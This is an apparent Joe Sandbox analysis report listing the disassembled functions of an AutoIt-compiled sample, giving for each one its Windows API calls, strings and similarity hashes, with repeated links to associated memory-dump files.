Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 3da28aaeb3da9240eb76496d22ceddc57c4d0b93888eaf29321615804d4e6611
Instruction ID: 633833ce3c366303f943b26b4b28d27779f17fd286865f0e4855e4f95eb07f53
Opcode Fuzzy Hash: 3da28aaeb3da9240eb76496d22ceddc57c4d0b93888eaf29321615804d4e6611
Instruction Fuzzy Hash: F2518938600289DFDF22DF68C988FAEBBE9AF45314F15422DE851EB290D3B49D04CB51

Function 00361765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0036179A
GetWindowRect.USER32(?,?), ref: 003617FE
ScreenToClient.USER32(?,?), ref: 0036181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0036182C
EndPaint.USER32(?,?), ref: 00361876

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 54c5512ea323c71233c823316bfced374e2a8b8f7b5004893842d45bc1ed0f29
Instruction ID: f13bf356fc92b306ac1ec25446765a32ebef41057564b61109611ed93340306e
Opcode Fuzzy Hash: 54c5512ea323c71233c823316bfced374e2a8b8f7b5004893842d45bc1ed0f29
Instruction Fuzzy Hash: 7841B2302047409FDB22DF25DCC4FB67BE8FB4A724F188669F5958B2A1C7B09845DB61

Function 003EB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004257B0,00000000,00E0CFA0,?,?,004257B0,?,003EB5A8,?,?), ref: 003EB712
EnableWindow.USER32(00000000,00000000), ref: 003EB736
ShowWindow.USER32(004257B0,00000000,00E0CFA0,?,?,004257B0,?,003EB5A8,?,?), ref: 003EB796
ShowWindow.USER32(00000000,00000004,?,003EB5A8,?,?), ref: 003EB7A8
EnableWindow.USER32(00000000,00000001), ref: 003EB7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 003EB7EF

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: c6e35b6ae0b2d069b458a409a2137fb600dc492a1922b0c8683a6b4a2f74b9ed
Instruction ID: b1698ae8da1bd7ec1eaa94a5c7bbe782f7ca85e48e75a106cbec804c8f3c9690
Opcode Fuzzy Hash: c6e35b6ae0b2d069b458a409a2137fb600dc492a1922b0c8683a6b4a2f74b9ed
Instruction Fuzzy Hash: CE417434600190EFDB23CF25C499B96BBE1FF45350F1942B9E9488FAE2C771A856CB51

Function 003D709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,003D4E41,?,?,00000000,00000001), ref: 003D70AC

Part of subcall function 003D39A0: GetWindowRect.USER32(?,?), ref: 003D39B3

GetDesktopWindow.USER32 ref: 003D70D6
GetWindowRect.USER32(00000000), ref: 003D70DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003D710F

Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC

GetCursorPos.USER32(?), ref: 003D713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003D7199

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 0ab3bdb8a480ce39e258adfb2652791f0753abe95ab407b985e2a2f09e124e19
Instruction ID: c8b6390cb8ae7e0cc9519bc97712139bd10db2aaad616d56205ee07021fe3318
Opcode Fuzzy Hash: 0ab3bdb8a480ce39e258adfb2652791f0753abe95ab407b985e2a2f09e124e19
Instruction Fuzzy Hash: A531D272509345AFD721DF14D849F9BB7EAFF88314F000A1AF5859B291DB70EA09CB92

Function 003B8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003B80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B80C0
Part of subcall function 003B80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B80CA
Part of subcall function 003B80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B80D9
Part of subcall function 003B80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B80E0
Part of subcall function 003B80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B80F6

GetLengthSid.ADVAPI32(?,00000000,003B842F), ref: 003B88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 003B88D6
HeapAlloc.KERNEL32(00000000), ref: 003B88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 003B88F6
GetProcessHeap.KERNEL32(00000000,00000000,003B842F), ref: 003B890A
HeapFree.KERNEL32(00000000), ref: 003B8911

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 3c8d918262a95e11e5eca19e3aa7990a29b3885820f55ca451f903e554f24c40
Instruction ID: c15c16592f19b227645741f9740745fe5dc1f7e9608f5a3861fb1e2a355cef91
Opcode Fuzzy Hash: 3c8d918262a95e11e5eca19e3aa7990a29b3885820f55ca451f903e554f24c40
Instruction Fuzzy Hash: 43119D71601209FFDF229BA4DC49BFE7BACEB45319F108128E945DB550CB729E04DB60

Function 003B85B0 Relevance: 9.1, APIs: 6, Instructions: 61processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003B85E2
OpenProcessToken.ADVAPI32(00000000), ref: 003B85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003B85F8
CloseHandle.KERNEL32(00000004), ref: 003B8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 003B8646

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 8c33b76b0f899e110edfd8e740d00be50bdfe1c5711db796e51fd4390bed5a9c
Instruction ID: b2f48b198dd0c577223b71ba2e58231e82b4875b15cb0dcf4cd9add0beddf8f3
Opcode Fuzzy Hash: 8c33b76b0f899e110edfd8e740d00be50bdfe1c5711db796e51fd4390bed5a9c
Instruction Fuzzy Hash: FF113A72501149AFDF12CFA4DD88AEE7BADEF48348F054165FA05A61A0C7718E64EB20

Function 003BB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 003BB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 003BB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003BB7CD
ReleaseDC.USER32(00000000,00000000), ref: 003BB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 003BB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 003BB7FE

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 110cd338cedde17b8aa07cac410d8a830018badfe3c83cae0fc089fff9f78daf
Instruction ID: 5a6c3af0f42d9ba041674d840e9cbb2675bf0f48277c5bcfa2c9db7ee0af54fc
Opcode Fuzzy Hash: 110cd338cedde17b8aa07cac410d8a830018badfe3c83cae0fc089fff9f78daf
Instruction Fuzzy Hash: 9C018875E00249FFEB115BA69C85A5EBFBCEF48311F004175FA04AB291DA719D00CF51

Function 00380162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00380193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0038019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 003801A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 003801B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 003801B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 003801C1

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 7d9aee579bf85c9785d2a99fdb6754be86cc6ae6583e36400bf1829b534da787
Instruction ID: be299c1bf68662e3222b418616f309ab265967ace5dca6e90feca8e1ff6e2c04
Opcode Fuzzy Hash: 7d9aee579bf85c9785d2a99fdb6754be86cc6ae6583e36400bf1829b534da787
Instruction Fuzzy Hash: A7016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C4B941C7F5A864CBE5

Function 003C53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003C53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003C540F
GetWindowThreadProcessId.USER32(?,?), ref: 003C541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C543E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: d8969d4662ba8801b5d5db573662c42ab4dc84dfbbb9df1162af396cf14e9b12
Instruction ID: d8f8a611580c1a6375e0c188c4f2ff88865d0be936c4f5ce4c5d10b6ff2b2c85
Opcode Fuzzy Hash: d8969d4662ba8801b5d5db573662c42ab4dc84dfbbb9df1162af396cf14e9b12
Instruction Fuzzy Hash: 0DF01D32241598BFE7325BA29C4EEAB7B7CEBC6B11F000269FA04D50D197E11A0186B5

Function 003C7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 003C7243
EnterCriticalSection.KERNEL32(?,?,00370EE4,?,?), ref: 003C7254
TerminateThread.KERNEL32(00000000,000001F6,?,00370EE4,?,?), ref: 003C7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00370EE4,?,?), ref: 003C726E

Part of subcall function 003C6C35: CloseHandle.KERNEL32(00000000,?,003C727B,?,00370EE4,?,?), ref: 003C6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 003C7281
LeaveCriticalSection.KERNEL32(?,?,00370EE4,?,?), ref: 003C7288

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 5dcd690cfa5e0869155a159ffaca1f318c18183fec779dc06d93bf1932f7d4b9
Instruction ID: 8bcc5ef57a53276aa1f82857bede745d1b0fd117c980d016d6526de025309ac2
Opcode Fuzzy Hash: 5dcd690cfa5e0869155a159ffaca1f318c18183fec779dc06d93bf1932f7d4b9
Instruction Fuzzy Hash: D3F03A3A540652AFD7231B64ED8CAEA773DEF45702F110A35F602990E0CBB65901CB50

Function 003B8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 003B899D
UnloadUserProfile.USERENV(?,?), ref: 003B89A9
CloseHandle.KERNEL32(?), ref: 003B89B2
CloseHandle.KERNEL32(?), ref: 003B89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 003B89C3
HeapFree.KERNEL32(00000000), ref: 003B89CA

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: be6537131d4d31244034727dde5c43d3c6da3037d99b1584062560295b422f8b
Instruction ID: 77d57e52c63b2e6ac818ebc984d61c6fe9b62518031c46ac105a4f7155e0cf64
Opcode Fuzzy Hash: be6537131d4d31244034727dde5c43d3c6da3037d99b1584062560295b422f8b
Instruction Fuzzy Hash: AEE0C236004049FFDA121FE1EC4C91ABB6DFB89362B108330F219890F0CBB29460DB50

Function 003B7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B7702
CLSIDFromProgID.OLE32(?,?,00000000,003EFB80,000000FF,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B7727
_memcmp.LIBCMT ref: 003B7748

Strings

,,?, xrefs: 003B753D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,?
API String ID: 314563124-1094787077
Opcode ID: 816948abb45dba9eddecce29c219eec0bb158a7c4f141c87f68976bba7242d54
Instruction ID: b19f66157f973490f2283245980b17e2bc29bffdf320a842a5670a39c37cccbc
Opcode Fuzzy Hash: 816948abb45dba9eddecce29c219eec0bb158a7c4f141c87f68976bba7242d54
Instruction Fuzzy Hash: F6810D75A00109EFCB05DFA4C984EEEB7B9FF89315F214558F606AB250DB71AE06CB60

Function 003D85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003D8613
CharUpperBuffW.USER32(?,?), ref: 003D8722
VariantClear.OLEAUT32(?), ref: 003D889A

Part of subcall function 003C7562: VariantInit.OLEAUT32(00000000), ref: 003C75A2
Part of subcall function 003C7562: VariantCopy.OLEAUT32(00000000,?), ref: 003C75AB
Part of subcall function 003C7562: VariantClear.OLEAUT32(00000000), ref: 003C75B7

Strings

AUTOIT.ERROR, xrefs: 003D8728
Incorrect Parameter format, xrefs: 003D864B, 003D880D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: f62d68443a88c04f97f8003a36b183f65b38042870c6adf7598a81d024dcb2de
Instruction ID: 7cabd69306067ad946b410b535a6c5f43b05b92d01093dce76a3d7fc82d24174
Opcode Fuzzy Hash: f62d68443a88c04f97f8003a36b183f65b38042870c6adf7598a81d024dcb2de
Instruction Fuzzy Hash: 88918C72608301DFC711DF24C48495ABBE8EF89714F14896EF98A8B3A1DB31E905CB92

Function 003C2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9

_memset.LIBCMT ref: 003C2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003C2C97

Strings

0, xrefs: 003C2B73

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 2a47d6633f7a8eb5eb923b410934ef5d10146d6d24391e61c714bf8b60e8f0e7
Instruction ID: 9598dd7d267c4897114be43969e7689879fcbfd670f36371303676840a2d783c
Opcode Fuzzy Hash: 2a47d6633f7a8eb5eb923b410934ef5d10146d6d24391e61c714bf8b60e8f0e7
Instruction Fuzzy Hash: A251CC712083019ED726AF28D885F6FB7E8AF99310F058A2DF895D61A0DBB0DC048792

Function 00373137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00373277
_memmove.LIBCMT ref: 00373310
_free.LIBCMT ref: 00373336
_memmove.LIBCMT ref: 003733E9

Strings

_7, xrefs: 00373322
3c7, xrefs: 00373225

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove$_free
String ID: 3c7$_7
API String ID: 2620147621-4188345352
Opcode ID: 84977687cf138eac788258bdfca685296dbe23e045516fb19a8f8af0188dd886
Instruction ID: 120a1fd82065047b4ac1910f3bde8ee21addcef0d13b15d950bb7907ae88e133
Opcode Fuzzy Hash: 84977687cf138eac788258bdfca685296dbe23e045516fb19a8f8af0188dd886
Instruction Fuzzy Hash: C3518B716087418FDB3ACF29C581B6BBBE5EF85310F09882DE88987350DB35E905CB82

Function 00376192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00376248
_memmove.LIBCMT ref: 003762E4
_memset.LIBCMT ref: 00376308

Strings

ERCP, xrefs: 003761B3
3c7, xrefs: 003762AF

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3c7$ERCP
API String ID: 2532777613-2328722621
Opcode ID: 6be3a460dd02b46ea37412c34d6690d0fcf5abb3a91b1bf56fb1336979fd1168
Instruction ID: b8a556ff9b804136ef3fc1acb35c8681d0d419b86437d36485ba28d56a58dd1f
Opcode Fuzzy Hash: 6be3a460dd02b46ea37412c34d6690d0fcf5abb3a91b1bf56fb1336979fd1168
Instruction Fuzzy Hash: 9951A070900B05DBDB26DF65C9927EBB7F8EF04304F20896EE54ADB691E774AA44CB40

Function 003C2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003C27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003C27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 003C2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00425890,00000000), ref: 003C286B

Strings

0, xrefs: 003C27B5

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
